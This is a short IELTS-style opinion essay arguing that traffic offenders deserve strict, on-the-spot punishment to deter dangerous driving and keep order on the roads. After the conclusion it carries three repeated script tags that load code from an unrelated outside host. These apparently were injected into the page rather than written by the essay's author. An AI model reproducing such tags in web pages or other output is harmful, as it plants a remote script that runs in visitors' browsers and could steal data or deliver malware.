Many people believe that strict punishment should be given to traffic offences. To what extent do you agree?

A lot of people think that traffic offenders should be punished strictly for the road traffic offences. In my opinion, I agree that people with traffic violations should be punished to maintain law and order, and to reduce the risk of fatal accidents costing serious injuries and deaths of the innocent people.

Many people believe that traffic violators should be punished strictly and I agree. Absence of punishment leads to increase the chances of fatal accidents. These accidents result into serious injuries, and possible deaths of innocent lives. Relaxation in traffic punishment encourage risky drivers to drive dangerously without taking any consideration of the effects of their actions on other road users. Therefore, traffic offenders should be punished to set example for other irresponsible drivers.

Additionally, punishment for traffic violations is also important to maintain law and order in the traffic. A flexibility in traffic offence punishment would encourage the society as a whole to break traffic rules on a daily basis. As a result, traffic laws would be in place, but without regulations. Regulation in traffic laws can only be achieved through strict punishment that sets example for every body. Moreover, most of the road users fail to understand that established traffic laws are for their own safety. It is the strict punishment only, that acts as a deterrent to such people for traffic violations.

In conclusion, I strongly believe that traffic offenders should be given strict punishment on the spot to reduce the risk of life costing fatal accidents, and to maintain regulations for the enacted traffic laws.

<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>